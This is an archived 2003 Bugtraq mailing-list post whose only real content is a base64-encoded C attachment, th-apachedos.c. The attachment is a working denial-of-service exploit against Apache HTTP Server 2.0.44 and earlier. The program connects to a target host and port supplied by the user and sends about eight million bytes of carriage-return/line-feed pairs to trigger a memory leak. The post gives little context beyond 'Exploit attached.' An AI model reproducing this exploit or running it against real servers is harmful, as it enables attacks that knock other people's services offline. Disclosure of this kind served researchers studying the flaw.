Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Thu, 10 Apr 2003 09:59:24 +0200
From: Daniel Nystr=?UTF-8?Q?=C3=B6m?= <daniel-nystrom@tyko.nu>
To: bugtraq@securityfocus.com
Subject: working apache <= 2.0.44 DoS exploit for linux.

--------=_ModWebBOUNDARY_b1009340_1049961564
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

Exploit attached. 

No replys to this e-mail adress plz.






--------=_ModWebBOUNDARY_b1009340_1049961564
Content-Type: text/plain;
	name="th-apachedos.c"
Content-Transfer-Encoding: BASE64
Content-Disposition: attachment;
	filename="th-apachedos.c"

LyogVmVyc2lvbiAyICovCi8qKioqKioqKiB0aC1hcGFjaGVkb3MuYyAqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoqICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICoKKiBSZW1vdGUgQXBhY2hlIERvUyBleHBsb2l0ICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqCiogLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
KgoqIFdyaXR0ZW4gYXMgYSBwb2MgZm9yIHRoZTogICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICoKKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqCiogICAg
aURFRkVOU0UgU2VjdXJpdHkgQWR2aXNvcnkgMDQuMDguMDM6ICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgKgoqICAgIGh0dHA6Ly93d3cuaWRlZmVuc2UuY29tL2Fkdmlzb3J5
LzA0LjA4LjAzLnR4dCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICoKKiAgICBEZW5pYWwg
b2YgU2VydmljZSBpbiBBcGFjaGUgSFRUUCBTZXJ2ZXIgMi54ICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAqCiogICAgQXByaWwgOCwgMjAwMyAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKgoqICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICoKKiBUaGlzIHByb2dyYW0gc2VuZHMgODAwMDAwMCBcbidzIHRvIGV4cGxvaXQgdGhlIEFw
YWNoZSBtZW1vcnkgbGVhay4gICAgICAgICAgICAqCiogV29ya3MgZnJvbSBzY3JhdGNoIHVuZGVy
IExpbnV4LCBhcyBvcHBvc2VkIHRvIGFwYWNoZS1tYXNzYWNyZS5jIC4gICAgICAgICAgICAgKgoq
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICoKKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqCiogRGFuaWVs
IE55c3Ry9m0gPGV4Y2VAbmV0d2luZGVyLm51PiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgKgoqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICoKKiAtIHd3dy50ZWxoYWNr
LnRrIC0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAqCiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKgoqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiB0aC1hcGFjaGVkb3MuYyAqKioqKioq
Ki8KCiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDxzdHJp
bmcuaD4KI2luY2x1ZGUgPGVycm5vLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1ZGUg
PG5ldGluZXQvaW4uaD4KI2luY2x1ZGUgPG5ldGRiLmg+CiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+
CgoKaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkKewoJaW50IHNvY2tmZDsKCWludCBj
b3VudDsKCWNoYXIgYnVmZmVyWzgwMDAwMDBdOwoJc3RydWN0IHNvY2thZGRyX2luIHRhcmdldDsK
CXN0cnVjdCBob3N0ZW50ICpoZTsKCglpZiAoYXJnYyAhPSAzKQoJewoJCWZwcmludGYoc3RkZXJy
LCAiXG5USC1hcGFjaGVkb3MuYyAtIEFwYWNoZSA8PSAyLjAuNDQgRG9TIGV4cGxvaXQuIik7CgkJ
ZnByaW50ZihzdGRlcnIsICJcbi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0iKTsKCQlmcHJpbnRmKHN0ZGVyciwgIlxuVXNhZ2U6ICVzIDxUYXJnZXQ+IDxQb3J0
PlxuXG4iLCBhcmd2WzBdKTsKCQlleGl0KC0xKTsKCX0KCQoJcHJpbnRmKCJcblRILUFwYWNoZSBE
b1NcbiIpOwoJcHJpbnRmKCItLS0tLS0tLS0tLS0tXG4iKTsKCXByaW50ZigiLT4gU3RhcnRpbmcu
Li5cbiIpOwkKCXByaW50ZigiLT5cbiIpOwoKLy8JbWVtc2V0KGJ1ZmZlciwgJ1xuJywgc2l6ZW9m
KGJ1ZmZlcikpOyAvKiB0ZXN0aW5nICovCgoJZm9yIChjb3VudCA9IDA7IGNvdW50IDwgODAwMDAw
MDspIAoJewoJCWJ1ZmZlcltjb3VudF0gPSAgJ1xyJzsgLyogMHgwRCAqLwoJCWNvdW50Kys7CgkJ
YnVmZmVyW2NvdW50XSA9ICAnXG4nOyAvKiAweDBBICovCgkJY291bnQrKzsKCX0KCglpZiAoKGhl
PWdldGhvc3RieW5hbWUoYXJndlsxXSkpID09IE5VTEwpCgl7CgkJaGVycm9yKCJnZXRob3N0Ynlu
YW1lKCkgZmFpbGVkICIpOwoJCWV4aXQoLTEpOwoJfQoKCW1lbXNldCgmdGFyZ2V0LCAwLCBzaXpl
b2YodGFyZ2V0KSk7CiAgICAgICAgdGFyZ2V0LnNpbl9mYW1pbHkgPSBBRl9JTkVUOwogICAgICAg
IHRhcmdldC5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsyXSkpOwogICAgICAgIHRhcmdldC5z
aW5fYWRkciA9ICooKHN0cnVjdCBpbl9hZGRyICopaGUtPmhfYWRkcik7CgogICAgICAgIHByaW50
ZigiLT4gQ29ubmVjdGluZyB0byAlczolZC4uLlxuIiwgaW5ldF9udG9hKHRhcmdldC5zaW5fYWRk
ciksIGF0b2koYXJndlsyXSkpOwoJcHJpbnRmKCItPlxuIik7CgoJaWYgKChzb2NrZmQ9c29ja2V0
KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpIDwgMCkKICAgICAgIAl7CiAgICAg
ICAgICAgICAgIAlwZXJyb3IoInNvY2tldCgpIGZhaWxlZCAiKTsKICAgICAgICAgICAgICAgCWV4
aXQoLTEpOwogICAgICAgCX0KICAgICAgIAkKICAgICAgIAlpZiAoY29ubmVjdChzb2NrZmQsIChz
dHJ1Y3Qgc29ja2FkZHIgKikmdGFyZ2V0LCBzaXplb2Yoc3RydWN0IHNvY2thZGRyKSkgPCAwKQog
ICAgICAgCXsKICAgICAgIAkJcGVycm9yKCJjb25uZWN0KCkgZmFpbGVkICIpOwogICAgICAgICAg
ICAgICAJZXhpdCgtMSk7CiAgICAgICAJfQoKICAgICAgICBwcmludGYoIi0+IENvbm5lY3RlZCB0
byAlczolZC4uLiBTZW5kaW5nIGxpbmVmZWVkcy4uLlxuIiwgaW5ldF9udG9hKHRhcmdldC5zaW5f
YWRkciksIGF0b2koYXJndlsyXSkpOwogICAgICAgIHByaW50ZigiLT5cbiIpOwoJCglpZiAoc2Vu
ZChzb2NrZmQsIGJ1ZmZlciwgc3RybGVuKGJ1ZmZlciksIDApICE9IHN0cmxlbihidWZmZXIpKQoJ
ewoJCXBlcnJvcigic2VuZCgpIGZhaWxlZCAiKTsKCQlleGl0KC0xKTsKICAgICAgIAkJY2xvc2Uo
c29ja2ZkKTsKCX0gCgoKCWNsb3NlKHNvY2tmZCk7CgoJcHJpbnRmKCItPiBGaW5pc2hlZCBzbW9v
dGhseSwgY2hlY2sgaG9zdHMgYXBhY2hlLi4uXG5cbiIpOwp9CgovKiBFT0YgLSB0aC1hcGFjaGVk
b3MuYwogKiBodHRwOi8vd3d3LnRlbGhhY2sudGsKICovCg==

--------=_ModWebBOUNDARY_b1009340_1049961564--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: